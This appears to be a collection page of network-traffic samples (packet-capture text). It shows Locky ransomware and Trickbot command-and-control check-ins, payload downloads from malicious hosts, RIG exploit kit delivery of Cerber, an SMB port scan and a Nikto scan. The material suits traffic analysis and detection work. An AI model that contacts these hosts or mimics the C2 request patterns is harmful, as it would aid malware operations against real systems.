Text Example


Locky Ransomware Variant Malware PCAP File Download Traffic Sample

2016-09-26 15:15:14.233356 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [P.], seq 1258:1735, ack 727, win 63514, length 477: HTTP: POST /apache_handler.php HTTP/1.1
POST /apache_handler.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://5.196.200.247/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 5.196.200.247
Content-Length: 780
Connection: Keep-Alive

2016-09-26 15:15:14.233380 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [.], ack 1735, win 64240, length 0
2016-09-26 15:15:14.233382 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [P.], seq 1735:2515, ack 727, win 63514, length 780: HTTP
.i…….P&p…n^.P….]..tRkhMmAN=%85%F3%F5_rh%8A%A6d%F2%88%17sk%5E%11%B8V%DC%22%27%B1j%01%1A%99%14%EEL%B8k%83%03%5D%CC%0Aa%27%08%90%B1o%80W%BF%C5%00%A5b&TKzJjd=%02%BE%19%DE%C4%CD%89%E7%AC%07%86%2Ak%0FX%28%8F&omNcncA=%9B%95x%FD%29%B0o%2F%5E%0Ax%F7%CF25%7Bl%EFI%E9%CE%FEo%A5%D8%B5%EC%EB%FE%21%F4%C1%BF%E0%B7%9B%8C%D4D%B5%17%11%CA%23&jZvk=%F6%13%09%C0%5D%90%D4u%93%E2%A0%89m%D9%C22u%FA%AA%B08%D2b%9C%1B%28zIG%CF%FBT%BA%40%99%EE%D3%A3.E7%0A%DED&NQkDpPm=%F3iMJ%BA%C8%CC%090%5B%A2%C4%EE%C6%04W%1B%D4%E5%9B6%26p%B2R%0E%15%CD%A3%D9%8F%7Dt%2BB%40B%B2%06%B1%12%13%19%A6E%E5%0F%8D&wpBRujHj=%90Ay%3D%F8%A8%DF%3D%D2%B8_P%F2%9F%A98%16%2C%C8d%B0%FE&lDJDaBsG=V%A8h%A2B%19%DC%FFg%1B%A0%B3%C5o%AC%08%E6%3B%0B%BE%26%D4y%EB%0FK%D3%29RC&Qdg=%94n%0F%82%A5C%7F%2F%8D%884%7F%E1f%99G%B5Q%7B%7DV%21%A52%FD%E2%99g&EJQKjhN=%21%9E%7D
2016-09-26 15:15:14.233384 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [.], ack 2515, win 64240, length 0
2016-09-26 15:15:14.390578 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [P.], seq 727:1453, ack 2515, win 64240, length 726: HTTP: HTTP/1.1 404 Not Found
HTTP/1.1 404 Not Found
Server: nginx/1.10.1
Date: Mon, 26 Sep 2016 19:15:28 GMT
Content-Type: text/html
Content-Length: 571
Connection: keep-alive

404 Not Found

nginx/1.10.1

2016-09-26 15:15:14.390873 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [.], ack 1453, win 62788, length 0
2016-09-26 15:15:14.391726 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [P.], seq 1260:1739, ack 727, win 63514, length 479: HTTP: POST /apache_handler.php HTTP/1.1
POST /apache_handler.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://62.173.154.240/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 62.173.154.240
Content-Length: 780
Connection: Keep-Alive

2016-09-26 15:15:14.391855 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [P.], seq 1739:2519, ack 727, win 63514, length 780: HTTP
.i>……PE…}td.P…&…tRkhMmAN=%85%F3%F5_rh%8A%A6d%F2%88%17sk%5E%11%B8V%DC%22%27%B1j%01%1A%99%14%EEL%B8k%83%03%5D%CC%0Aa%27%08%90%B1o%80W%BF%C5%00%A5b&TKzJjd=%02%BE%19%DE%C4%CD%89%E7%AC%07%86%2Ak%0FX%28%8F&omNcncA=%9B%95x%FD%29%B0o%2F%5E%0Ax%F7%CF25%7Bl%EFI%E9%CE%FEo%A5%D8%B5%EC%EB%FE%21%F4%C1%BF%E0%B7%9B%8C%D4D%B5%17%11%CA%23&jZvk=%F6%13%09%C0%5D%90%D4u%93%E2%A0%89m%D9%C22u%FA%AA%B08%D2b%9C%1B%28zIG%CF%FBT%BA%40%99%EE%D3%A3.E7%0A%DED&NQkDpPm=%F3iMJ%BA%C8%CC%090%5B%A2%C4%EE%C6%04W%1B%D4%E5%9B6%26p%B2R%0E%15%CD%A3%D9%8F%7Dt%2BB%40B%B2%06%B1%12%13%19%A6E%E5%0F%8D&wpBRujHj=%90Ay%3D%F8%A8%DF%3D%D2%B8_P%F2%9F%A98%16%2C%C8d%B0%FE&lDJDaBsG=V%A8h%A2B%19%DC%FFg%1B%A0%B3%C5o%AC%08%E6%3B%0B%BE%26%D4y%EB%0FK%D3%29RC&Qdg=%94n%0F%82%A5C%7F%2F%8D%884%7F%E1f%99G%B5Q%7B%7DV%21%A52%FD%E2%99g&EJQKjhN=%21%9E%7D
2016-09-26 15:15:14.391863 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [.], ack 1739, win 64240, length 0
2016-09-26 15:15:14.391865 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [.], ack 2519, win 64240, length 0
2016-09-26 15:15:14.575076 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [P.], seq 727:1453, ack 2519, win 64240, length 726: HTTP: HTTP/1.1 404 Not Found
HTTP/1.1 404 Not Found
Server: nginx/1.10.1
Date: Mon, 26 Sep 2016 19:15:14 GMT
Content-Type: text/html
Content-Length: 571
Connection: keep-alive

404 Not Found

nginx/1.10.1

2016-09-26 15:15:14.575385 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [.], ack 1453, win 62788, length 0
2016-09-26 15:15:14.748030 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [S], seq 3107914475, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2016-09-26 15:15:17.758523 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [S], seq 3107914475, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2016-09-26 15:15:21.819893 IP 104.239.213.7.80 > 10.9.26.105.49188: Flags [S.], seq 3863520333, ack 3107914476, win 64240, options [mss 1460], length 0
2016-09-26 15:15:21.820158 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [.], ack 1, win 64240, length 0
2016-09-26 15:15:21.820289 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [P.], seq 1:476, ack 1, win 64240, length 475: HTTP: POST /apache_handler.php HTTP/1.1
POST /apache_handler.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://cifkvluxh.su/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cifkvluxh.su
Content-Length: 780
Connection: Keep-Alive

SMB NMAP Portscan Port scanning PCAP File Download Traffic Sample Analysis

2017-06-20 14:09:12.664927 IP 10.101.22.128.49739 > 221.184.213.149.445: Flags [S], seq 3893475975, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-06-20 14:09:12.758627 IP 10.101.22.128.49741 > 212.104.117.73.445: Flags [S], seq 1202043706, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-06-20 14:09:12.771825 IP 10.72.158.57.59199 > 10.101.21.107.445: Flags [S], seq 436800387, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2017-06-20 14:09:12.785013 IP 172.20.31.74.64831 > 10.101.20.47.445: Flags [S], seq 347664739, win 8192, options [mss 1380,nop,wscale 2,sackOK,TS val 51473388 ecr 0], length 0
2017-06-20 14:09:12.820839 IP 10.101.22.128.49743 > 118.239.76.174.445: Flags [S], seq 502529660, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-06-20 14:09:12.867372 IP 10.27.117.40.51918 > 10.101.21.40.445: Flags [S], seq 252935156, win 8192, options [mss 1380,nop,wscale 2,nop,nop,sackOK], length 0
2017-06-20 14:09:12.867686 IP 10.101.22.128.49744 > 130.69.49.167.445: Flags [S], seq 839731710, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-06-20 14:09:12.947781 IP 10.102.169.67.57901 > 10.101.21.54.445: Flags [S], seq 2258261251, win 5840, options [mss 1460,sackOK,TS val 2207468264 ecr 0,nop,wscale 2,unknown-76 0x0101644405e50005,unknown-76 0x0c05,nop,eol], length 0
2017-06-20 14:09:12.958471 IP 172.20.147.59.58165 > 10.101.20.79.445: Flags [S], seq 721417024, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2017-06-20 14:09:12.992756 IP 10.101.22.128.49746 > 152.222.186.96.445: Flags [S], seq 464388263, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-06-20 14:09:13.039562 IP 10.101.22.128.49748 > 29.89.169.211.445: Flags [S], seq 855875173, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-06-20 14:09:13.070724 IP 10.101.22.128.49749 > 152.100.211.153.445: Flags [S], seq 1583303698, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-06-20 14:09:13.073884 IP 10.89.37.211.53044 > 10.101.21.118.445: Flags [S], seq 801397140, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-06-20 14:09:13.226796 IP 10.101.22.128.49752 > 187.236.46.149.445: Flags [S], seq 21748602, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-06-20 14:09:13.258021 IP 10.101.22.128.49753 > 216.57.215.72.445: Flags [S], seq 4161335896, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-06-20 14:09:13.296307 IP 10.102.169.129.51237 > 10.101.20.177.445: Flags [S], seq 973127344, win 5840, options [mss 1460,sackOK,TS val 2207468613 ecr 0,nop,wscale 2,unknown-76 0x0101644405e50005,unknown-76 0x0c05,nop,eol], length 0
2017-06-20 14:09:13.320605 IP 10.101.22.128.49755 > 202.253.124.66.445: Flags [S], seq 2143311680, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-06-20 14:09:13.461584 IP 10.101.22.128.49757 > 56.71.64.115.445: Flags [S], seq 868905440, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

Malspam Campaign Delivers Trickbot Malware PCAP file Download Traffic Sample

2018-06-29 12:54:14.644477 IP 172.16.1.102.49198 > 134.119.189.10.80: Flags [P.], seq 1:76, ack 1, win 64240, length 75: HTTP: GET /lop.bin HTTP/1.1
GET /lop.bin HTTP/1.1
Host: srienterprises.net
Connection: Keep-Alive

2018-06-29 12:54:14.644487 IP 134.119.189.10.80 > 172.16.1.102.49198: Flags [.], ack 76, win 64240, length 0
2018-06-29 12:54:14.844854 IP 134.119.189.10.80 > 172.16.1.102.49198: Flags [P.], seq 1:2741, ack 76, win 64240, length 2740: HTTP: HTTP/1.1 200 OK

2018-06-29 12:55:45.742934 IP 172.16.1.102.49203 > 192.35.177.64.80: Flags [.], ack 1, win 64240, length 0
2018-06-29 12:55:45.743083 IP 172.16.1.102.49203 > 192.35.177.64.80: Flags [P.], seq 1:140, ack 1, win 64240, length 139: HTTP: GET /roots/dstrootcax3.p7c HTTP/1.1
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

2018-06-29 12:55:45.743140 IP 192.35.177.64.80 > 172.16.1.102.49203: Flags [.], ack 140, win 64240, length 0
2018-06-29 12:55:45.804452 IP 192.35.177.64.80 > 172.16.1.102.49203: Flags [P.], seq 1:1219, ack 140, win 64240, length 1218: HTTP: HTTP/1.1 200 OK

HTTP/1.1 200 OK

2018-06-29 12:55:46.005784 IP 172.16.1.102.49204 > 8.250.199.254.80: Flags [.], ack 1, win 64240, length 0
2018-06-29 12:55:46.005788 IP 172.16.1.102.49204 > 8.250.199.254.80: Flags [P.], seq 1:218, ack 1, win 64240, length 217: HTTP: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86400
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

2018-06-29 12:55:46.005788 IP 8.250.199.254.80 > 172.16.1.102.49204: Flags [.], ack 218, win 64240, length 0

2018-06-29 12:55:46.064711 IP 8.250.199.254.80 > 172.16.1.102.49204: Flags [P.], seq 1:1371, ack 218, win 64240, length 1370: HTTP: HTTP/1.1 200 OK

2018-06-29 12:57:48.184025 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [.], ack 1, win 64240, length 0
2018-06-29 12:57:48.184275 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [P.], seq 1:148, ack 1, win 64240, length 147: HTTP: GET /table.png HTTP/1.1
GET /table.png HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: WinHTTP loader/1.0
Host: 85.143.220.29

2018-06-29 12:57:48.184329 IP 85.143.220.29.80 > 172.16.1.102.49208: Flags [.], ack 148, win 64240, length 0

2018-06-29 12:57:48.278295 IP 172.16.1.102.138 > 172.16.1.255.138: NBT UDP PACKET(138)

2018-06-29 12:58:08.163467 IP 172.16.1.8.445 > 172.16.1.102.49476: Flags [R.], seq 28547, ack 540206, win 0, length 0
2018-06-29 12:58:08.854164 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [P.], seq 148:295, ack 385267, win 64240, length 147: HTTP: GET /toler.png HTTP/1.1
GET /toler.png HTTP/1.1
Cache-Control: no-cache

2018-06-29 12:58:08.854312 IP 172.16.1.102.49205 > 185.231.154.104.443: Flags [P.], seq 35002:35407, ack 104145, win 62791, length 405

2018-06-29 12:58:17.086787 IP 172.16.1.102.49482 > 188.124.167.132.8082: Flags [P.], seq 1:231, ack 1, win 64240, length 230
POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/90 HTTP/1.1
Content-Type: multipart/form-data; boundary=Arasfjasu7
User-Agent: test
Host: 188.124.167.132:8082
Content-Length: 4701
Cache-Control: no-cache

2018-06-29 12:58:17.086832 IP 188.124.167.132.8082 > 172.16.1.102.49482: Flags [.], ack 231, win 64240, length 0

2018-06-29 12:58:17.086835 IP 172.16.1.102.49482 > 188.124.167.132.8082: Flags [.], seq 231:1691, ack 1, win 64240, length 1460

2018-06-29 12:58:26.662877 IP 172.16.1.102.49528 > 85.143.220.29.80: Flags [.], ack 1, win 64240, length 0
2018-06-29 12:58:26.663148 IP 172.16.1.102.49528 > 85.143.220.29.80: Flags [P.], seq 1:75, ack 1, win 64240, length 74: HTTP: GET /worming.png HTTP/1.1
GET /worming.png HTTP/1.1
Connection: Keep-Alive
Host: 85.143.220.29

2018-06-29 13:00:42.880606 IP 172.16.1.102.49532 > 188.124.167.132.8082: Flags [P.], seq 1:312, ack 1, win 64240, length 311
POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 188.124.167.132
Connection: close
Content-Type: multipart/form-data; boundary=———WMGTRKAJOYFBWHYO
Content-Length: 274

2018-06-29 13:00:42.880689 IP 188.124.167.132.8082 > 172.16.1.102.49532: Flags [.], ack 312, win 64240, length 0

2018-06-29 13:00:43.803141 IP 172.16.1.102.49533 > 188.124.167.132.8082: Flags [P.], seq 1:313, ack 1, win 64240, length 312
POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/82/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 188.124.167.132
Connection: close
Content-Type: multipart/form-data; boundary=———OUYLMXQCWCVFOBNR
Content-Length: 2229

Nikto Vulnerability Scan Web Scan PCAP file Download Traffic Analysis

2017-05-09 12:37:59.683142 IP 127.0.0.1.46236 > 127.0.0.1.80: Flags [P.], seq 1:140, ack 1, win 342, options [nop,nop,TS val 1906265 ecr 1906265], length 139: HTTP: HEAD / HTTP/1.1
HEAD / HTTP/1.1
User-Agent: Mozilla/4.75 (Nikto/2.1.4) (Evasions:None) (Test:Port Check)
Host: www.sec542.org
Connection: Keep-Alive

2017-05-09 12:37:59.683158 IP 127.0.0.1.80 > 127.0.0.1.46236: Flags [.], ack 140, win 350, options [nop,nop,TS val 1906265 ecr 1906265], length 0
2017-05-09 12:37:59.683362 IP 127.0.0.1.80 > 127.0.0.1.46236: Flags [P.], seq 1:309, ack 140, win 350, options [nop,nop,TS val 1906265 ecr 1906265], length 308: HTTP: HTTP/1.1 200 OK

2017-05-09 12:37:59.911325 IP 127.0.0.1.46236 > 127.0.0.1.80: Flags [P.], seq 140:275, ack 309, win 350, options [nop,nop,TS val 1906322 ecr 1906265], length 135: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
User-Agent: Mozilla/4.75 (Nikto/2.1.4) (Evasions:None) (Test:getinfo)
Host: www.sec542.org
Connection: Keep-Alive

2017-05-09 12:37:59.913490 IP 127.0.0.1.80 > 127.0.0.1.46236: Flags [P.], seq 309:2776, ack 275, win 359, options [nop,nop,TS val 1906323 ecr 1906322], length 2467: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Tue, 09 May 2017 16:37:59 GMT
Server: Apache/2.4.7 (Ubuntu)

2017-05-09 12:37:59.923296 IP 127.0.0.1.46236 > 127.0.0.1.80: Flags [P.], seq 275:412, ack 2776, win 1373, options [nop,nop,TS val 1906325 ecr 1906323], length 137: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
User-Agent: Mozilla/4.75 (Nikto/2.1.4) (Evasions:None) (Test:map_codes)
Host: www.sec542.org
Connection: Keep-Alive

2017-05-09 12:37:59.923546 IP 127.0.0.1.80 > 127.0.0.1.46236: Flags [P.], seq 2776:5243, ack 412, win 367, options [nop,nop,TS val 1906325 ecr 1906325], length 2467: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Tue, 09 May 2017 16:37:59 GMT
Server: Apache/2.4.7 (Ubuntu)

2017-05-09 12:37:59.928206 IP 127.0.0.1.46236 > 127.0.0.1.80: Flags [P.], seq 412:561, ack 5243, win 2397, options [nop,nop,TS val 1906326 ecr 1906325], length 149: HTTP: GET /ZJ2qzIGY.asa HTTP/1.1
GET /ZJ2qzIGY.asa HTTP/1.1
Connection: Keep-Alive
Host: www.sec542.org
User-Agent: Mozilla/4.75 (Nikto/2.1.4) (Evasions:None) (Test:map_codes)

PSEUDO-DARKLEECH RIG EK Exploit Kit Delivers Cerber Ransomware PCAP file Download

2016-12-11 16:42:13.907878 IP 10.12.10.101.49182 > 195.133.48.182.80: Flags [P.], seq 1489:2173, ack 21396, win 63936, length 684: HTTP: GET /?q=znbQMvXcJwDQDofGMvrESLtEMU3QA0KK2OH_76yyEoH9JHT1vrHUSkrttgWCel-&aqs=mozilla.96b65.406f1e1&ie=Windows-1251&oq=C8aAlL7BXbgS03hDRflRjnYcLAwsa9_-ph0eDwEeb1JaDqxy9YgxB-5qlV7F8jg&sourceid=mozilla&es_sm=99 HTTP/1.1
GET /?q=znbQMvXcJwDQDofGMvrESLtEMU3QA0KK2OH_76yyEoH9JHT1vrHUSkrttgWCel-&aqs=mozilla.96b65.406f1e1&ie=Windows-1251&oq=C8aAlL7BXbgS03hDRflRjnYcLAwsa9_-ph0eDwEeb1JaDqxy9YgxB-5qlV7F8jg&sourceid=mozilla&es_sm=99 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://acc.xrossflex.com/?sourceid=yandex&q=znvQMvXcJwDQDoDGMvrESLtEMU7QA0KK2OH_76uyEoH9JHT1vrfUSkrtt&aqs=yandex.100l87.406n0h1&ie=Windows-1
x-flash-version: 11,7,700,232
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: acc.xrossflex.com
Connection: Keep-Alive

2016-12-11 16:42:14.617380 IP 195.133.48.182.80 > 10.12.10.101.49182: Flags [P.], seq 21396:22747, ack 2173, win 64240, length 1351: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Sun, 11 Dec 2016 20:42:01 GMT
Content-Length: 13529
Content-Type: application/x-shockwave-flash
Via: 1.1 proxy5.cosa.root.ci.sat.tx.us:80 (Cisco-WSA/9.1.1-074)
Connection: keep-alive


2016-12-11 16:42:16.868147 IP 10.12.10.101.49185 > 195.133.48.182.80: Flags [P.], seq 1:443, ack 1, win 64240, length 442: HTTP: GET /?sourceid=mozilla&es_sm=120&ie=UTF-8&oq=C8fJ-JbBSOlC0jRbVKgAwno9UBAtC_qn4iUTcnx_Nh8OD_RTbUQ9E_JaQHYFmmF4&aqs=mozilla.75b112.406z2q4&q=wX3QMvXcJwDQDIbGMvrESLtFNknQA0KK2Iv2_dqyEoH9fGnihNzUSkr36B2aCm2 HTTP/1.1
GET /?sourceid=mozilla&es_sm=120&ie=UTF-8&oq=C8fJ-JbBSOlC0jRbVKgAwno9UBAtC_qn4iUTcnx_Nh8OD_RTbUQ9E_JaQHYFmmF4&aqs=mozilla.75b112.406z2q4&q=wX3QMvXcJwDQDIbGMvrESLtFNknQA0KK2Iv2_dqyEoH9fGnihNzUSkr36B2aCm2 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: acc.xrossflex.com

2016-12-11 16:42:16.868305 IP 195.133.48.182.80 > 10.12.10.101.49185: Flags [.], ack 443, win 64240, length 0
2016-12-11 16:42:17.538090 IP 195.133.48.182.80 > 10.12.10.101.49183: Flags [.], seq 1:1461, ack 433, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Sun, 11 Dec 2016 20:42:03 GMT
Accept-Ranges: bytes
Content-Length: 276726
Content-Type: application/x-msdownload
Via: 1.1 proxy5.cosa.root.ci.sat.tx.us:80 (Cisco-WSA/9.1.1-074)
Connection: keep-alive

2016-12-11 16:44:08.514628 IP 10.12.10.101.49187 > 185.69.153.226.80: Flags [P.], seq 1:343, ack 1, win 64240, length 342: HTTP: GET /0123-4567-89AB-CDEF-0123?iframe HTTP/1.1
GET /0123-4567-89AB-CDEF-0123?iframe HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ffoqr3ug7m726zou.uld7hk.top
Connection: Keep-Alive